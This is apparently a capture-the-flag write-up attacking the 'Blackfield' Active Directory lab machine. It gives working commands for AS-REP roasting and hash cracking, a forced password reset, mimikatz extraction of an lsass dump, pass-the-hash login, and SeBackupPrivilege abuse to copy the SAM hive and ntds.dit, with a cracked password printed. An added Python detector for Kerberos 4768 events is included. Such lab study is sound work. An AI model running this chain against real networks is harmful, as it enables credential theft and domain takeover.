10.10.10.192
```
Open 10.10.10.192:53
Open 10.10.10.192:88
Open 10.10.10.192:135
Open 10.10.10.192:389
Open 10.10.10.192:445
Open 10.10.10.192:593
Open 10.10.10.192:3268
Open 10.10.10.192:5985
```
```
ldapsearch -x -s base namingcontexts -h 10.10.10.192
```
![[Pasted image 20220115204257.png]]
BLACKFIELD.local
```
ldapsearch -x -D '' -w '' -b "DC=BLACKFIELD,DC=local" -h 10.10.10.192
```
domain name : BLACKFIELD
### get-userlist
```
impacket-lookupsid [email protected] | tee user.txt
```
![[Pasted image 20220115205117.png]]
We get a large user list.
```
impacket-GetNPUsers -no-pass -dc-ip 10.10.10.192 BLACKFIELD.local/ -usersfile user -format hashcat
```
![[Pasted image 20220115205206.png]]
```
[email protected]:cd519fec4b8458479ce5f1814c19aa1e$3f2353e9aa85c41167a76e566a53439a6d7093b2d175f96f331089fe78e96f584a5edf377778cfd2b851662043f634bca1ee627a972ecdb0ce5e9da9a63dfcfd6423e80e3f45fc90e39e90436b3b27caa0eb1f6956e86793779219001d224099d46f625b824980bca7c13331296cf3535b0593c625ec87368962eb38f039bd2346e8df732c054ffca9d5642e4baa6d12592c61dbf8960c19028ab6ac33a79890ef688d22129c22327dcfabb5a160dfef863ac9d6af41d75133285718ee7eda0377f7898428105a2a8210608a4960bff2172887a2346b49988a0fc39f9141e7bae6cd61d904374fdaca225a4a030d760737a84747
```
```
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --show
support : #00^BlackKnight
```
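From the defender's side, the GetNPUsers/hashcat step above leaves a trace on the domain controller: each account with "Do not require Kerberos preauthentication" set produces a 4768 event with Pre-Authentication Type 0 and Ticket Encryption Type 0x17 (RC4), and a user-list sweep produces many such requests from one source. The following is an added detection example, not part of the original writeup; the event records are constructed and the field names follow the 4768 event's own fields.

```python
"""Flag AS-REP-roastable accounts and user-list sweeps in Kerberos 4768 events."""
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23: the key type cracked with hashcat -m 18200

# Constructed sample 4768 records (not real DC logs), one dict per event.
SAMPLE_4768 = [
    {"TargetUserName": "support", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "audit2020", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x19"},
    {"TargetUserName": "svc-backup", "IpAddress": "10.10.10.50",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "jdoe", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x19"},
]


def is_asrep_roastable(ev):
    """A TGT was issued with no pre-auth and RC4: the AS-REP is crackable offline."""
    return (ev["PreAuthType"] == "0"
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and ev["Status"] == "0x0")


def roastable_accounts(events):
    """Accounts whose AS-REP left the DC in crackable form (fix: enable pre-auth)."""
    return sorted({ev["TargetUserName"] for ev in events if is_asrep_roastable(ev)})


def noisy_sources(events, min_accounts=3):
    """Sources that requested TGTs without pre-auth for many distinct accounts,
    the shape a user-list sweep leaves regardless of each request's outcome."""
    seen = defaultdict(set)
    for ev in events:
        if ev["PreAuthType"] == "0":
            seen[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: len(users) for ip, users in seen.items() if len(users) >= min_accounts}


if __name__ == "__main__":
    print("roastable accounts:", roastable_accounts(SAMPLE_4768))
    print("sweep sources:", noisy_sources(SAMPLE_4768))
```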
and we can log in via WinRM,
![[Pasted image 20220115205611.png]]
and use smbclient to view the shares:
```
ADMIN$     NO ACCESS  Remote Admin
C$         NO ACCESS  Default share
forensic   NO ACCESS  Forensic / Audit share.
IPC$       READ ONLY  Remote IPC
NETLOGON   READ ONLY  Logon server share
profiles$  READ ONLY
SYSVOL     READ ONLY  Logon server share
```
```
smbclient //10.10.10.192/profiles$ -U "support"
sudo mount -t cifs -o user=support //10.10.10.192/profiles$ /lab_test/windows_privilege/htb/ad/Blackfield/mount/test
```
but found nothing useful there.
```
/opt/Active_domain/bloodhound/BloodHound.py/bloodhound.py -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
```
![[Pasted image 20220115212853.png]]
Mark them as high value and look for the shortest path to them from the owned user, support.
![[Pasted image 20220115212922.png]]
We can't log in as support with evil-winrm, but from rpcclient we can reset the audit2020 account's password:
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
```
# at the rpcclient prompt (authenticated as support); info level 23 sets the password
setuserinfo2 Audit2020 23 'S3cret123!'
# verify the new credential
crackmapexec smb 10.10.10.192 -u Audit2020 -p 'S3cret123!'
```
![[Pasted image 20220115213914.png]]
![[Pasted image 20220115214733.png]]
```
smbmap -H 10.10.10.192 -u "audit2020" -p "S3cret123\!"
```
```
smbclient //10.10.10.192/forensic -U "audit2020"
```
![[Pasted image 20220115215027.png]]
![[Pasted image 20220115215226.png]]
Download it (lsass.DMP) and run mimikatz.exe against the dump:
```
sekurlsa::minidump lsass.DMP
log lsass.txt
sekurlsa::logonPasswords
```
![[Pasted image 20220115221001.png]]
```
evil-winrm -i 10.10.10.192 -u 'svc-backup' -H "9658d1d1dcd9250115e2205d9f48400d"
```
![[Pasted image 20220115221006.png]]
```
whoami /all
```
and we see dangerous privileges:
```
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
```
![[Pasted image 20220115221223.png]]
https://github.com/gtworek/Priv2Admin/blob/master/SeBackupPrivilege.md
```
cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"
```
But we also need HKLM\SECURITY for the local secrets, and our permissions are not sufficient for that, so instead we back up ntds.dit, located at c:\windows\ntds\ntds.dit
```
echo y | wbadmin start backup -backuptarget:. -include:c:\windows\ntds\
```